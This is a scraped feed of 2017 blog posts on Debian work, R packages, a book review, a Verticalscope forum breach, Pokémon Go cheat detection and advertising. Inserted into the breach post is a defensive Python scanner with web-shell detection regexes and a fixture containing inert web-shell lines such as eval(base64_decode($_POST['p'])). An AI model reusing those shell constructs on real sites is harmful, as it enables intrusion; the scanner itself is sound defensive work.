He has informed me that next Saturday we will build an intercom system “like we have at school.” I’m going to have to have some ideas on how to tie Squeezebox in with Asterisk to make that happen, I think. Maybe this will do.


Planet DebianThorsten Alteholz: My Debian Activities in October 2017

FTP assistant

Again, this month almost the same numbers as last month appeared in the statistics. I accepted 214 packages and rejected 22 uploads. The overall number of packages that got accepted this month was only 339.

Debian LTS

This was the fortieth month in which I did some work for the Debian LTS initiative, started by Raphael Hertzog at Freexian.

This month my overall workload has been 20.75h. During that time I did LTS uploads of:

  • [DLA 1125-1] botan1.10 security update for one CVE
  • [DLA 1127-1] sam2p security update for 6 CVEs
  • [DLA 1143-1] curl security update for one CVE
  • [DLA 1149-1] wget security update for two CVEs

I also took care of radare2 twice and marked all four CVEs as not-affected for Wheezy and Jessie. As nobody else wanted to address the issues in wireshark yet, I now started to work on this package.

Last but not least I did one week of frontdesk duties.

Other stuff

During October I took care of some bugs and at one go uploaded new upstream versions of hoel and duktape (this had to be done twice as I introduced a new bug with the first upload :-(). I only fixed bugs in glewlwyd and smstools. This month I also sponsored an upload of printrun.

After about ten years of living without any power outage, some construction worker decided to cut a cable near my place. Unfortunately one of my computers used for recording TV shows did not boot after the cable had been repaired and I had to switch some timers to other boxes. All in all this was too much stress and I purchased some USVs from APC. As apcupsd was orphaned, I took the opportunity to adopt it as DOPOM for this month.

My license pasting project now contains 31 license templates for your debian/copyright. The list of available texts can be obtained with:

curl http://licapi.debian.net/template

The license text itself is available under the given links, for example with

curl http://licapi.debian.net/template/Apache-2

  • http://licapi.debian.net/template/Apache-2
  • http://licapi.debian.net/template/Artistic-2.0
  • http://licapi.debian.net/template/BSL-1.0
  • http://licapi.debian.net/template/CC0
  • http://licapi.debian.net/template/CC-BY-3.0
  • http://licapi.debian.net/template/CC-BY-4.0
  • http://licapi.debian.net/template/CC-BY-SA-3.0
  • http://licapi.debian.net/template/CC-BY-SA-4.0
  • http://licapi.debian.net/template/Cygwin
  • http://licapi.debian.net/template/EPL-1.0
  • http://licapi.debian.net/template/Expat
  • http://licapi.debian.net/template/GPL-2
  • http://licapi.debian.net/template/GPL-2+
  • http://licapi.debian.net/template/GPL-3
  • http://licapi.debian.net/template/GPL-3+
  • http://licapi.debian.net/template/ISC
  • http://licapi.debian.net/template/LGPL-2
  • http://licapi.debian.net/template/LGPL-2+
  • http://licapi.debian.net/template/LGPL-2.1
  • http://licapi.debian.net/template/LGPL-2.1+
  • http://licapi.debian.net/template/LGPL-3
  • http://licapi.debian.net/template/LGPL-3+
  • http://licapi.debian.net/template/LPPL-1.2
  • http://licapi.debian.net/template/LPPL-1.3a
  • http://licapi.debian.net/template/LPPL-1.3c
  • http://licapi.debian.net/template/MPL-1.0
  • http://licapi.debian.net/template/MPL-1.1
  • http://licapi.debian.net/template/MPL-2.0
  • http://licapi.debian.net/template/OFL-1.0
  • http://licapi.debian.net/template/OFL-1.1
  • http://licapi.debian.net/template/Zlib

Planet DebianDirk Eddelbuettel: pinp 0.0.4: Small tweak

A maintenance release of our pinp package for snazzier one or two column vignettes is now on CRAN as of yesterday.

In version 0.0.3, we disabled the default \pnasbreak command we inherit from the PNAS LaTeX style. That change turns out to have been too drastic. So we reverted that change and added a new YAML front-matter option, skip_final_break, which, if set to TRUE, skips this break. With a default value of FALSE we maintain the prior behaviour.

A screenshot of the package vignette can be seen below. Additional screenshots are at the pinp page.

The NEWS entry for this release follows.

Changes in pinp version 0.0.4 (2017-11-04)

  • Correct NEWS headers from 'tint' to 'pinp' (#45).

  • New front-matter variable ‘skip_final_break’ skips the \pnasbreak on the final page, which is back as the default (#47).

Courtesy of CRANberries, there is a comparison to the previous release. More information is on the tint page. For questions or comments use the issue tracker off the GitHub repo.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

Planet DebianRuss Allbery: Review: Sweep in Peace

Review: Sweep in Peace, by Ilona Andrews

Series: Innkeeper Chronicles #2
Publisher: NYLA
Copyright: 2015
ISBN: 1-943772-32-0
Format: Kindle
Pages: 302

This is the sequel to Clean Sweep. You could pick up the background as you go along, but the character relationships benefit from reading the series in order.

Dina's inn is doing a bit better, but it still desperately needs guests. That means she's not really in a position to say no when an Arbitrator shows up at her door and asks her to host a peace summit. Lucky for the Arbitrator, since every other inn on Earth did say no.

Nexus has been the site of a viciously bloody conflict between the vampires, the Hope-Crushing Horde, and the Merchants of Baha-char for years. All sides have despaired of finding any form of peace. The vampires and the Horde have both deeply entrenched themselves in a cycle of revenge. The Merchants have the most strategic position and an apparently unstoppable warrior. The situation is hopeless; by far the most likely outcome will be open warfare inside the inn, which would destroy its rating and probably Dina's future as an innkeeper. Dina will need all of her power and caution just to stop that; peace seems beyond any possibility, but thankfully isn't her problem. Maybe the Arbitrator can work some miracle if she can just keep everyone alive.

And well fed. Which is another problem. She has enough emergency money for the food, but somehow cook for forty people from four different species while keeping them all from killing each other? Not a chance. She's going to have to hire someone somehow, someone good, even though she can't afford to pay.

Sweep in Peace takes this series farther out of urban fantasy territory and farther into science fiction, and also ups the stakes (and the quality of the plot) a notch. We get three moderately interesting alien species with only slight trappings of fantasy, a wonderful alien chef who seems destined to become a regular in the series, and a legitimately tricky political situation. The politics and motives aren't going to win any awards for deep and subtle characterization, but that isn't what the book is going for. It's trying to throw enough challenges at Dina to let her best characteristics shine, and it does that rather well.

The inn continues to be wonderful, although I hope it becomes more of a character in its own right as the series continues. Dina's reshaping of it for guests, and her skill at figuring out the rooms her guests would enjoy, is my favorite part of these books. She cares about making rooms match the personality of her guests, and I love books that give the character a profession that matters to them even if it's unrelated to the plot. I do wish Andrews would find a few other ways for Dina to use her powers for combat beyond tentacles and burying people in floors, but that's mostly a quibble.

You should still not expect great literature. I guessed the big plot twist several chapters before it happened, and the resolution is, well, not how these sorts of political situations resolve in the real world. But there is not a stupid love affair, there are several interesting characters, and one of the recurring characters gets pretty solid and somewhat unusual characterization. And despite taking the plot in a more serious direction, Sweep in Peace retains its generally lighthearted tone and firm conviction in Dina's ability to handle just about anything. Also, the chef is wonderful.

One note: Partway into the book, I started getting that "oh, this is a crossover" feeling (well-honed by years of reading comic books). As near as I can tell from a bit of research, Andrews pulled in some of their characters from the Edge series. This was a bit awkward, in the "who are these people and why do they seem to have more backstory than any of the other supporting characters" cross-over sort of way, but the characters that were pulled in were rather intriguing. I might have to go read the Edge books now.

Anyway, if you liked Clean Sweep, this is better in pretty much every way. Recommended.

Followed by One Fell Sweep.

Rating: 8 out of 10

Planet DebianJunichi Uekawa: It's already November.

It's already November. Been reading up a bit on C++17 features and improvements. Nice.


Planet DebianAlexander Wirt: debconf mailinglists moved to lists.debian.org

Today I had the pleasure to move the debconf mailing lists to lists.debian.org. That means that the following mailing lists:

are now hosted on lists.debian.org. Please update any documentation or bookmarks you have.

Next step would be to join debconf again ;).

Planet DebianSteinar H. Gunderson: Trøndisk 2017 live stream

We're streaming live from Trøndisk 2017, first round of the Norwegian ultimate frisbee series, today from 0945 CET and throughout the day/weekend. It's an interesting first for Nageru in that it's sports, where everything happens much faster and there are more demands for overlay graphics (I've made a bunch of CasparCG templates). I had hoped to get to use Narabu in this, but as the (unfinished) post series indicates, I simply had to prioritize other things. There's plenty of new things for us anyway, not the least that I'll be playing and not operating. :-)

Feel free to tune in to the live stream, although we don't have international stream reflectors. It's a fun sport with many nice properties. :-) There will be YouTube not too long after the day is over, too.

Edit: All games from Saturday and Sunday are now online; see this YouTube list. Most commentary is in Norwegian, although some games are in English. I was happy everything worked well, and the production crew did a great job (I was busy playing), but of course there's tons of small things we want to improve for next time.

Rondam RamblingsRacism is alive and well in America

If you needed more evidence that racism is alive and well in America (yeah, as if) look no further than a Louisiana judge's recent decision to deny a black man his right to an attorney because he didn't ask like a white person would. And then there's John Kelly, who was supposed to be the grown up in the room, saying that "the lack of an ability to compromise led to the Civil War."  That the

Planet DebianLouis-Philippe Véronneau: Migrating my website to Pelican

After too much time lying to myself, telling myself things like "I'll just add this neat feature I want on my blog next week", I've finally made the big jump, ditched django and migrated my website to Pelican.

I'm going to the Cambridge Mini-Debconf at the end of the month for the Debconf Videoteam Autumn sprint and I've taken the task of making daily sprint reports for the team. That in turn means I have to publish my blog on Planet Debian. My old website not having feeds made this a little hard and this perfect storm gave me the energy to make the migration happen.

Anyway, django was fun. Building a (crappy) custom blogging engine with it taught me some rough basics, but honestly I don't know why I ever thought it was a good idea.

Don't get me wrong: django is great and should definitely be used for large and complicated websites. My blog just ain't one.

Migrating to Pelican was pretty easy since it also uses Jinja2 templates and generates content from Markdown. The hardest part was actually bending it to replicate the weird and specific behavior I wanted it to have.

So yeah, woooo, I migrated to Pelican. Who cares, right? Well, if you are amongst the very, very few people who read the blog posts I mainly write for myself, you'll be pleased to know that:

  • Tags are now implemented
  • You can subscribe to a wide array of ATOM feeds to follow my blog

Here's a bonus picture of a Pelican from Wikimedia, just for the sake of it:

A pelican

TEDWhen two take the stage: Images from TEDWomen 2017 duets

If you think a TED Talk is always a solo star turn, think again. Every year at TEDWomen, we feature a whole session devoted to talks given by two partners.  Whether they’re couples, collaborators, parent and kid, or best friends, the onstage chemistry is always fun to watch. In this photo gallery you may get the idea:

Friends and collaborators Tiffany Mugo and Siphumeze Khundayi are talking here about open-minded, joyful sexuality, inspired by African traditions with a modern twist. Photo: Ryan Lash / TED

Ples Felix, left, and Azim Khamisa, center, share their heartfelt thank-yous with the audience as they close their talk. Behind them on the screen is their third partner, Ples’ grandson Tony, who’ll join their work fighting youth violence as soon as he leaves prison next year. They speak at TEDWomen 2017. Photo: Ryan Lash / TED

Best friends Felice Belle and Jennifer Murphy crack each other up onstage at TEDWomen. Photo: Ryan Lash / TED

Joan Blades and John Gable seem to be putting into practice the idea they came to share: that we should all try to listen to one another better and honor each other’s perspectives. Photo: Ryan Lash / TED

After Jess Search, left, hosted a sparkling Session 5, she passed the baton to our conference co-host Pat Mitchell, who stepped in to handle some housekeeping notes to the audience. Photo: Ryan Lash / TED

During our Facebook Live chat with Justin Baldoni, host Manoush Zomorodi has a moment. We may all have had that same moment. Photo: Ryan Lash / TED


Planet Linux AustraliaOpenSTEM: This Week in HASS – term 4, week 5

Halfway through the last term of the year already! This week our youngest students consider museums as a place to learn about the past. Slightly older students are learning about the states and territories of Australia, as well as their representative birds and animals. Older students are in throes of their class election campaign, preparing […]

Planet DebianDirk Eddelbuettel: tint 0.0.4: Small enhancements

A maintenance release of the tint package arrived on CRAN earlier today. Its name expands from tint is not tufte as the package offers a fresher take on the Tufte-style for html and pdf presentations.

A screenshot of the pdf variant is below.

This release brings some minor enhancements and polish, mostly learned from having done the related pinp (two-column vignette in the PNAS style) and linl (LaTeX letter) RMarkdown-wrapper packages; see below for details from the NEWS.Rd file.

Changes in tint version 0.0.4 (2017-11-02)

  • Skeleton files are also installed as vignettes (#20).

  • A reference to the Tufte source file now points to tint (Ben Marwick in #19, later extended to other Rmd files).

  • Several spelling and grammar errors were corrected too (#13 and #16 by R. Mark Sharp and Matthew Henderson)

Courtesy of CRANberries, there is a comparison to the previous release. More information is on the tint page.

For questions or comments use the issue tracker off the GitHub repo.



Krebs on Security2nd Breach at Verticalscope Impacts Millions

For the second time in as many years, hackers have compromised Verticalscope.com, a Canadian company that manages hundreds of popular Web discussion forums totaling more than 45 million user accounts. Evidence of the breach was discovered just before someone began using that illicit access as a commercial for a new paid search service that indexes consumer information exposed in corporate data breaches.

Toronto-based Verticalscope runs a network of sites that cater to automotive, pets, sports and technology markets. Verticalscope acknowledged in June 2016 that a hacking incident led to the siphoning of 45 million user accounts. Now, it appears the company may have been hit again, this time in a breach involving at least 2.7 million user accounts.

On Thursday, KrebsOnSecurity was contacted by Alex Holden, a security researcher and founder of Hold Security. Holden saw evidence of hackers selling access to Verticalscope.com and to a host of other sites operated by the company.

Holden said at first he suspected someone was merely trying to resell data stolen in the 2016 breach. But that was before he contacted one of the hackers selling the data and was given screen shots indicating that Verticalscope.com and several other properties were in fact compromised with a backdoor known as a “Web shell.”

A backdoor “Web shell” discovered on Verticalscope.com this week.

With a Web shell installed on a site, anyone can remotely administer the site, upload and delete content at will, or dump entire databases of information — such as usernames, passwords, email addresses and Internet addresses associated with each account.

Holden said the intruders obfuscated certain details in the screenshots that gave away exactly where the Web shells were hidden on Verticalscope.com, but that they forgot to blur out a few critical details — allowing him to locate at least two backdoors on Verticalscope’s Web site. He also was able to do the same with a second screen shot the hackers shared which showed a similar backdoor shell on Toyotanation.com, one of Verticalscope’s most-visited forums.

Reached for comment about the claims, Verticalscope said the company had detected an intrusion on six of its Web sites, including Toyotanation.com.

“The intrusion granted access to each individual website files,” reads a statement shared by Verticalscope. “Out of an abundance of caution, we have removed the file manager, expired all passwords on the 6 websites in question, added the malicious file pattern and attack vector to our detection tools, and taken additional steps to lock down access.”
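A defender-side illustration of the kind of “malicious file pattern” check that Verticalscope’s statement mentions, added here as an example for this page rather than the company’s own tooling: the indicator regexes, the names of upload directories and the fixture files are constructed assumptions, not the signatures the company actually used. It walks a web root, flags files whose text matches common web shell shapes, and separately flags any server-side script sitting in a directory meant only for user uploads (the route a file manager or avatar upload typically opens up).

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Heuristic indicators (assumptions drawn from common defender practice, not
# Verticalscope's actual "malicious file pattern"). Each is a regex over file text.
INDICATORS = {
    # eval() fed by a decoding/decompression call: the classic obfuscated-payload shape
    "eval_of_decoded_payload": re.compile(
        r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    # command execution whose argument comes straight from the HTTP request
    "shell_exec_of_request_input": re.compile(
        r"\b(?:system|exec|shell_exec|passthru|popen|proc_open)\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b",
        re.I),
    # PHP variable-function call with the function name taken from the request
    "dynamic_function_from_request": re.compile(
        r"\$_(?:GET|POST|REQUEST|COOKIE)\s*\[[^\]]+\]\s*\(", re.I),
    # preg_replace with the /e modifier (removed in PHP 7), which evaluates the replacement
    "preg_replace_eval_modifier": re.compile(
        r"preg_replace\s*\(\s*['\"][^'\"]*/[imsxu]*e[imsxu]*['\"]", re.I),
}

SCRIPT_EXTENSIONS = {".php", ".phtml", ".php5", ".phar"}
UPLOAD_DIR_NAMES = {"uploads", "attachments", "avatars"}  # assumption: static-content dirs
MAX_SCAN_BYTES = 2 * 1024 * 1024                          # regex only the first 2 MiB


def scan_file(path: Path):
    """Return a finding dict for one file; 'indicators' is empty when the file looks clean."""
    data = path.read_bytes()
    text = data[:MAX_SCAN_BYTES].decode("utf-8", errors="replace")
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    # An executable script inside a directory that should only hold user uploads is a
    # strong signal on its own, even when the code is obfuscated past the regexes above.
    parents = {p.lower() for p in path.parts[:-1]}
    if path.suffix.lower() in SCRIPT_EXTENSIONS and parents & UPLOAD_DIR_NAMES:
        hits.append("script_in_upload_directory")
    return {"path": str(path), "sha256": hashlib.sha256(data).hexdigest(), "indicators": hits}


def scan_tree(root):
    """Walk a web root and return findings for files carrying at least one indicator,
    sorted by path so two runs can be diffed."""
    files = (p for p in sorted(Path(root).rglob("*")) if p.is_file())
    return [f for f in (scan_file(p) for p in files) if f["indicators"]]


def build_fixture(root):
    """Write constructed sample files: a benign forum script, a JPEG stub, and a file
    planted in the uploads directory carrying the indicator strings (inert: they sit
    inside a PHP comment and never execute)."""
    root = Path(root)
    uploads = root / "forum" / "uploads"
    uploads.mkdir(parents=True)
    (root / "forum" / "index.php").write_text(
        "<?php\nrequire 'config.php';\necho render_page($_GET['page'] ?? 'home');\n")
    (uploads / "photo.jpg").write_bytes(b"\xff\xd8\xff\xe0 constructed JPEG stub")
    (uploads / "avatar_1234.php").write_text(
        "<?php\n/* constructed fixture, never executed:\n"
        "   eval(base64_decode($_POST['p']));\n"
        "   $_REQUEST['f']($_REQUEST['a']);\n*/\n")


def demo():
    """Build the fixture in a temporary directory, scan it, and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        build_fixture(tmp)
        return scan_tree(tmp)


if __name__ == "__main__":
    for finding in demo():
        print(finding["path"], finding["sha256"][:12], ", ".join(finding["indicators"]))
```

The SHA-256 in each finding is what you would hand to the rest of the detection stack once a file is confirmed malicious; the regex hits are only a triage signal and will miss anything encoded differently, which is why the directory-placement check runs independently of them.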

Verticalscope said the other forums impacted included Jeepforum.com — the company’s second most-popular site; and watchuseek.com, a forum for wristwatch enthusiasts.

Verticalscope admitted a breach in 2016 after their forum users’ data was outed in a blog post on Leakedsource.com, a now-defunct service that sold access to username and password details stolen in some of history’s largest data breaches.

An Internet search on one of the compromised Verticalscope domains leads to a series of now-deleted Pastebin posts suggesting that the individual(s) responsible for this hack may be trying to use it to advertise a legally dicey new online service called LuiDB.

Similar to Leakedsource, LuiDB allows registered users to search for account details associated with any data element compromised in a breach — such as login, password, email, first/last name and Internet address. The first search is free, but viewing results requires purchasing a subscription for between $5 and $400 in Bitcoin.

The various subscription packages sold by LuiDB, payable in Bitcoin.

People who re-use passwords across multiple Web sites tend to be those hardest-hit by these breaches, and by these dodgy password lookup services. It may not seem like a big deal if someone chooses to re-use the same password across a range of sites that don’t ask for or store your personal data, such as discussion forums. The problem is that this encourages poor password habits, and for many folks this eventually results in using that forum password at more important sites that do store sensitive data.

In practice, there’s no reason people should ever re-use the same password. Password managers can help users pick and remember unique, strong passwords for all sites that require a login; all the user needs to do is remember a single “master password” to unlock all the others. Old schoolers like Yours Truly tend to stick to local password managers like Keepass (or even PwdSafe), although many folks I admire in the security industry rely heavily on cloud-based password managers like LastPass and Dashlane.

While few online discussion forums offer two-factor or multi-factor authentication (e.g., requiring you to log in with both a password and a one-time code), a great many services do offer this very effective security measure. Check out twofactorauth.org to see if there are online services you use that could be further hardened by turning on two-factor authentication.

CryptogramFriday Squid Blogging: Squid Product Recall

Lidl is recalling two of its packaged squid products because of the presence of struvite salt crystals.

The danger is unclear. The article says that struvite crystals "may be mistaken as glass fragments," which isn't actually dangerous. It also says: "As these salt crystals may cause injury, the product should not be consumed." Maybe it's the intestinal tract that mistakes the crystals for glass.

As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered.

Read my blog posting guidelines here.

CryptogramFraud Detection in Pokémon Go

I play Pokémon Go. (There, I've admitted it.) One of the interesting aspects of the game I've been watching is how the game's publisher, Niantic, deals with cheaters.

There are three basic types of cheating in Pokémon Go. The first is botting, where a computer plays the game instead of a person. The second is spoofing, which is faking GPS to convince the game that you're somewhere you're not. These two cheats are often used together -- and you see the results in the many high-level accounts for sale on the Internet. The third type of cheating is the use of third-party apps like trackers to get extra information about the game.

None of this would matter if everyone played independently. The only reason any player cares about whether other players are cheating is that there is a group aspect of the game: gym battling. Everyone's enjoyment of that part of the game is affected by cheaters who can pretend to be where they're not, especially if they have lots of powerful Pokémon that they collected effortlessly.

Niantic has been trying to deal with this problem since the game debuted, mostly by banning accounts when it detects cheating. Its initial strategy was basic -- algorithmically detecting impossibly fast travel between physical locations or super-human amounts of playing, and then banning those accounts -- with limited success. The limiting factor in all of this is false positives. While Niantic wants to stop cheating, it doesn't want to block or limit any legitimate players. This makes it a very difficult problem, and contributes to the balance in the attacker/defender arms race.
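As an added illustration of the two heuristics described above, impossibly fast travel between reported locations and super-human amounts of play time, here is example code written for this page; it is not Niantic's detection logic, and the thresholds, account names and location reports are constructed assumptions. The minimum-distance gate shows the false-positive trap the paragraph mentions: a one-second GPS jump of a few hundred metres implies thousands of km/h but is jitter, not spoofing.

```python
import math
from dataclasses import dataclass
from datetime import datetime, timedelta

EARTH_RADIUS_KM = 6371.0

# Thresholds are illustrative assumptions, not Niantic's real parameters.
MAX_PLAUSIBLE_SPEED_KMH = 1200.0  # faster than any airliner: nobody legitimately moves this fast
MIN_DISTANCE_KM = 2.0             # hops shorter than this are ignored; GPS jitter over one
                                  # second would otherwise yield absurd speeds (false positives)
MAX_ACTIVE_HOURS_PER_DAY = 20.0   # more than this in one day is "super-human" play


@dataclass(frozen=True)
class Event:
    """One location report from the game client (constructed data shape)."""
    account: str
    ts: datetime
    lat: float
    lon: float


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two WGS84 points, in kilometres."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi = p2 - p1
    dlmb = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlmb / 2) ** 2
    return 2 * EARTH_RADIUS_KM * math.asin(math.sqrt(a))


def _group_by_account(events):
    """Sort reports by account and time so consecutive pairs can be compared."""
    grouped = {}
    for ev in sorted(events, key=lambda e: (e.account, e.ts)):
        grouped.setdefault(ev.account, []).append(ev)
    return grouped


def impossible_travel(events):
    """Flag consecutive reports whose implied speed no vehicle could reach.
    Returns a list of (account, timestamp, implied_speed_kmh)."""
    flags = []
    for account, evs in _group_by_account(events).items():
        for prev, cur in zip(evs, evs[1:]):
            dist = haversine_km(prev.lat, prev.lon, cur.lat, cur.lon)
            hours = (cur.ts - prev.ts).total_seconds() / 3600.0
            if dist < MIN_DISTANCE_KM or hours <= 0:
                continue  # jitter or duplicate timestamp: not evidence of spoofing
            speed = dist / hours
            if speed > MAX_PLAUSIBLE_SPEED_KMH:
                flags.append((account, cur.ts, round(speed, 1)))
    return flags


def superhuman_play(events, session_gap=timedelta(minutes=10)):
    """Estimate active hours per account and day by summing the gaps between consecutive
    reports shorter than session_gap (a longer gap means the player stopped).
    Returns {(account, day): hours} for days over MAX_ACTIVE_HOURS_PER_DAY."""
    flagged = {}
    for account, evs in _group_by_account(events).items():
        active = {}
        for prev, cur in zip(evs, evs[1:]):
            gap = cur.ts - prev.ts
            if gap <= session_gap:
                day = cur.ts.date().isoformat()
                active[day] = active.get(day, 0.0) + gap.total_seconds() / 3600.0
        for day, hours in active.items():
            if hours > MAX_ACTIVE_HOURS_PER_DAY:
                flagged[(account, day)] = round(hours, 2)
    return flagged


def sample_events():
    """Constructed location reports: alice walks across Manhattan, bob 'teleports' from
    New York to London in five minutes, carol shows a one-second GPS jump of under a
    kilometre, and dave reports in every five minutes for 22 hours straight."""
    noon = datetime(2017, 11, 3, 12, 0, 0)
    events = [
        Event("alice", noon, 40.7128, -74.0060),
        Event("alice", noon + timedelta(minutes=30), 40.7812, -73.9665),
        Event("bob", noon, 40.7128, -74.0060),
        Event("bob", noon + timedelta(minutes=5), 51.5074, -0.1278),
        Event("carol", noon, 40.7128, -74.0060),
        Event("carol", noon + timedelta(seconds=1), 40.7208, -74.0060),
    ]
    midnight = datetime(2017, 11, 3, 0, 0, 0)
    events += [Event("dave", midnight + timedelta(minutes=5 * i), 40.7128, -74.0060)
               for i in range(265)]
    return events


if __name__ == "__main__":
    evs = sample_events()
    print("impossible travel:", impossible_travel(evs))
    print("super-human play :", superhuman_play(evs))
```

Only bob (New York to London in five minutes) and dave (22 active hours in one day) are flagged; carol's jitter hop is discarded by the distance gate even though its raw implied speed is far above the threshold, which is the balance between catching spoofers and not banning legitimate players that the paragraph describes.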

Recently, Niantic implemented two new anti-cheating measures. The first is machine learning to detect cheaters. About this, we know little. The second is to limit the functionality of cheating accounts rather than ban them outright, making it harder for cheaters to know when they've been discovered.

"This may very well be the beginning of Niantic's machine learning approach to active bot countering," user Dronpes writes on The Silph Road subreddit. "If the parameters for a shadowban are constantly adjusted server-side, as they can now easily be, then Niantic's machine learning engineers can train their detection (classification) algorithms in ever-improving, ever more aggressive ways, and botters will constantly be forced to re-evaluate what factors may be triggering the detection."

One of the expected future features in the game is trading. Creating a market for rare or powerful Pokémon would add a huge additional financial incentive to cheat. Unless Niantic can effectively prevent botting and spoofing, it's unlikely to implement that feature.

Cheating detection in virtual reality games is going to be a constant problem as these games become more popular, especially if there are ways to monetize the results of cheating. This means that cheater detection will continue to be a critical component of these games' success. Anything Niantic learns in Pokémon Go will be useful in whatever games come next.

Mystic, level 39 -- if you must know.

And, yes, I know the game works by tracking your location. I'm all right with that. As I repeatedly say, Internet privacy is all about trade-offs.

Worse Than FailureError'd: Going for the Gold!

"Starting from one star, I'm almost at that gold five-star rating," writes Sam K.

 

"The octopus in the exhibit was a no show, but hey, at least I have a desktop to play around in," wrote Steve W.

 

Mike N. writes, "Thanks Walgreens! I'm looking forward to spending my $[mi_reward]."

 

"Salesforce Apex Code deployment is such a joy," wrote Bruce C., "Turns out my 9 components are 11 in Salesforce's eye - maybe they're counting in octal?"

 

"That's so true of PayPal, those [object:Object] fees will get you every time," wrote Brian K.

 

Shahim M. writes, "Yeah. I'm going to have to pass on that offer to save Rs. 0.68."

 


Don MartiWorld's last web advertising optimist tells all!

It's getting hard to explain still taking web advertising seriously in 2017, so I had better write something down. To start with, what is web advertising exactly?

Doesn't sound good so far. Maybe I'm a fool to be the last advertising optimist on the web. (See, for example: me, running my mouth about how great advertising is, to an audience of web publishers looking to write it off and move on.)

From the point of view of users, web advertising has failed to hold up its end of the signal for attention bargain, and substituted nasty attempts at manipulation. No wonder people block it.

From the point of view of clients, web advertising has failed to meet the basic honesty standards that any third-rate print publication can. And every web advertising company is calling fraud an industry-wide problem, which is what business people say when they really don't care about fixing something.

From the point of view of publishers, web advertising has failed to show the proverbial money. It's stuck at a fraction of the value per user minute that print can pull in, which means that as print goes away, so does the ad money.

Web advertising has failed the audience, the advertisers, and the people who make ad-supported news and cultural works. Maybe I should go be a fan of something else, like securitizing bug trackers or something. Web advertising just is that annoying, creepy thing that browsers are competing to block in different, creative, ways. "[T]he online ad sector transitioned from a creative-led industry to a data and algorithms-led industry," wrote venture capitalist Adam Fisher, who is understandably proud of not investing in it.

Some new companies, such as Scroll, are all about making it easier for readers to buy out of seeing advertising. Advertising is to web sites as annoying "UNREGISTERED SHAREWARE" banners and dialogs are to computer software.

On Twitter, what does the "verified" blue checkmark get you? A ticket out of Twitter's world-classedly crappy advertising.

At least search advertising is working. Bob Hoffman calls it a "much better yellow pages." But any kind of brand-building, signal-carrying advertising, where most of the money is? Not there. Ever notice how much of the evidence for "data-driven" advertising is anecdotal?

Is anyone speaking up for web advertising? Not really. Where advertising still has a policy voice, it's a bunch of cut-and-paste anti-privacy advocacy that sounds like what you might get from eighth grade Libertarians, or from people who are so bad at math they assume that it's humanly possible to read and understand Terms of Service from 70 third-party trackers on one web page. The Interactive Advertising Bureau has become the voice of schemes that are a few pages of fine print away from malware and spam. By expanding to include members whose interests oppose those of legit publishers and advertisers, and defending every creepy user privacy violation scheme that the worst members come up with, an organization that could have been a voice for pro-advertising policy positions has made itself meaningless. Right now the IAB is about as relevant to web advertising policy as the Tetraethyl Lead Industry Association is relevant to transportation policy.

Bad news all the way around, right? But some of us have been somewhere like this before.

Remember the operating systems market in the late 1990s?

In 1998, Unix was on the way out.

All the right-thinking people were going Windows NT.

Yes, even Tim O'Reilly, who built version 1.0 of his company on Unix, had apparently written it off. The spring 1998 O’Reilly catalog had all Windows books on the cover, and the Unix stuff was in back. O’Reilly and Associates was promoting the company’s first and only shrink-wrap software, a web server for Windows NT.

And why not? Bickering Unix vendors were doing short-sighted stunts such as removing the compiler from the basic version, and charging hard-to-justify prices for workstations and servers that users could beat with a properly-configured PC. Who needed it?

We know what happened shortly after that. The Unix scene (did anyone ever make a "Lumascape"-like chart of the Unix vendors?) faded away and, with enough drama to make for good IT news coverage but not enough to interfere with successful efforts to fix the Year 2000 Problem, the Linux scene replaced it.

The good news is that people employed in the Unix scene were able to move, in most cases happily, to the Linux scene. (Which is big enough that it has become the OS for the "IoT", "SaaS" and "Cloud" businesses, and a majority of "mobile" by units, but not, of course, profits.) So maybe my experience living through the end of Unix is why I'm still a web advertising optimist. The economic niche for advertising hasn't gone away. Just as software had to get some important licensing and API decisions right in order to make the Linux boom happen, web advertising is so close to getting it right, too. Now that we know the basics...

  1. People have norms about data sharing. Browsers must reflect those norms or get replaced.

  2. People enjoy ad-supported news, cultural works, and services, and will tolerate ads that hold up their end of the bargain.

  3. People don't like to micromanage their attention and privacy, and expect companies they deal with to cover the costs of coming into compliance with norms.

...the next steps are coming together pretty quickly.

Forget iPhone X–Apple's Best Product Is Its Privacy Stance

Five Books to Make You Less Stupid About the Civil War

The Atlantic Made $0.004 From Russian Ads

Coders of the world, unite: can Silicon Valley workers curb the power of Big Tech?

Silicon Valley helped Russia sway the US election. So now what? | Emily Bell

Direct ad buys are back in fashion as programmatic declines

Why we need a 21st-century Martin Luther to challenge the church of tech

Firefox takes a bite out of the canvas ‘super cookie’

We need to think more about advertising

Three ways of re-creating Firefox Focus behavior on Firefox desktop

Need a super, super secure way to access The New York Times site? Now you can try it via a Tor Browser

Twitter urged firms to delete data during 2016 campaign

‘The art of buying crap’: The Guardian wants publishers to unite to clean up programmatic

The advertising industry has been living a lie

Consent to use personal data has no value unless one prevents all data leakage

Civil, the blockchain-based journalism marketplace, is building its first batch of publications

What Facebook Did to American Democracy

The Great Ad Tech Cleanup

How Silicon Valley’s Dirty Tricks Helped Stall Broadband Privacy in California

When the Facebook Traffic Goes Away

This new Twitter account hunts for bots that push political opinions

Publishers are struggling to monetize the ‘Trump bump’ as advertisers avoid controversial content

Med Men: where the parody lies


Krebs on SecurityEquifax Reopens Salary Lookup Service

Equifax has re-opened a Web site that lets anyone look up the salary history of a large portion of the American workforce using little more than a person’s Social Security number and their date of birth. The big-three credit bureau took the site down just hours after I wrote about it on Oct. 8, and began restoring the site eight days later, saying it had added unspecified “security enhancements.”

The Work Number, Equifax’s salary and employment history portal.

At issue is a service provided by Equifax’s TALX division called The Work Number. The service is designed to provide automated employment and income verification for prospective employers, and tens of thousands of companies report employee salary data to it. The Work Number also allows anyone whose employer uses the service to provide proof of their income when purchasing a home or applying for a loan.

